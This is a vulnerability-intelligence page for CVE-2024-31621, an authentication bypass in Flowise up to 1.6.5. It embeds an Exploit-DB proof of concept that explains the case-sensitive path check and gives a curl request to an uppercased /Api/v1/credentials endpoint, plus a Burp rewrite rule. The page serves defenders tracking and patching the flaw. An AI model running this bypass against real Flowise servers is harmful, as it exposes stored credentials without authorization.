VIR Vulnerability Intelligence Relay

CVE-2024-31621

unknown
Published 2024-04-29 ยท Modified 2024-08-02
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
1.0

Description

Flowise vulnerable to code injection via api/v1

Predictions

Exploit likelihood
30%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-52001 webapps typescript text ยท 1 KB
Maerifat Majeed ยท 2024-04-21

Flowise 1.6.5 - Authentication Bypass

text exploit Source: Exploit-DB 
# Exploit Title: Flowise 1.6.5 - Authentication Bypass
# Date: 17-April-2024
# Exploit Author: Maerifat Majeed
# Vendor Homepage: https://flowiseai.com/
# Software Link: https://github.com/FlowiseAI/Flowise/releases
# Version: 1.6.5
# Tested on: mac-os
# CVE : CVE-2024-31621

The flowise version <= 1.6.5 is vulnerable to authentication bypass
vulnerability.
The code snippet

this.app.use((req, res, next) => {
>                 if (req.url.includes('/api/v1/')) {
>                     whitelistURLs.some((url) => req.url.includes(url)) ?
> next() : basicAuthMiddleware(req, res, next)
>                 } else next()
>             })


puts authentication middleware for all the endpoints with path /api/v1
except a few whitelisted endpoints. But the code does check for the case
sensitivity hence only checks for lowercase /api/v1 . Anyone modifying the
endpoints to uppercase like /API/V1 can bypass the authentication.

*POC:*
curl http://localhost:3000/Api/v1/credentials
For seamless authentication bypass. Use burpsuite feature Match and replace
rules in proxy settings. Add rule Request first line api/v1 ==> API/V1

Package impact
EcosystemPackageVulnerableFixed
npm npmflowise<1.8.11.8.1

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.